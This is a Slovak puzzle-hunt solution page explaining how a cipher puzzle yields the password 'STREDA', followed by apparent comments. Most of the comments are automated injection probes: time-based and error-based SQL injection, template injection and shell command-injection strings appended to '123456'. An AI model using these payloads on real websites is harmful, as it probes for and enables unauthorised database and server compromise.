heslo: STREDA
Na bloku sú položky zo šifrovacieho obchodu, niekto si tam zjavne nakupuje veci, ktoré si chce vziať na (terénnu) šifrovačku. Každá vec sa dá pomenovať jedným slovom.
Ďalej si môžeme všimnúť, že ceny všetkých položiek majú tvar X.Y0, kde X ≤ Y. Toto by mohlo hovoriť, že správne pomenovanie veci má Y písmen a my chceme zobrať X-té z nich.
Postupne teda dostaneme tieto slová a písmená: batoH, cEruzka, termoSka, euroobaL, nOžnice, kompaS, zošiT, pRavítko, dEka, lepiDlo a baterkA/čelovkA. Prečítame tajničku „HESLO STREDA“.
(Slovo „zlatý“ je referenciou na knihu a film Zlatý kompas a je v zadaní kvôli rozlíšeniu kompasu a buzoly.)
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',2)='k
123456'"\(
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
123456鎈'"\(
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('k',2)
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1511687916')))>'0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('t',0)
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1468000786')))
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/cast(md5('1183815465')as/**/int)>0
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select'1'from/**/cast(md5(1072171155)as/**/int))>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
extractvalue(1,concat(char(126),md5(1842102032)))
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456"and/**/extractvalue(1,concat(char(126),md5(1254228552)))and"
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456'and/**/extractvalue(1,concat(char(126),md5(1222480983)))and'
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
123456
123456
123456
<%- 825693005+943368632 %>
123456
123456
123456
#set($c=858937805+952733473)${c}$c
123456
123456
expr 873755819 + 945471943
${(981377462+932628849)?c}
123456
123456"and"u"="c
123456&set /A 871626838+945829928
${854500616+969227103}
123456
123456"and"a"="a
123456$(expr 931836377 + 927142428)
/*1*/{{967226956+862618385}}
123456
123456'and'f'='u
123456|expr 990083763 + 882224066
123456
123456
123456'and'p'='p
123456
expr 917286655 + 839036427
123456
123456
123456/**/and+2=5
'-var_dump(md5(580476713))-'
123456
123456
123456/**/and+3=3
123456
${@var_dump(md5(155259305))};
${968869045+951938508}
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
Aha, tak externa pamat nie je kniha a textilia pod zadok nie su gate :D Uznavam, riesenie je lepsie ako nase vymysly :)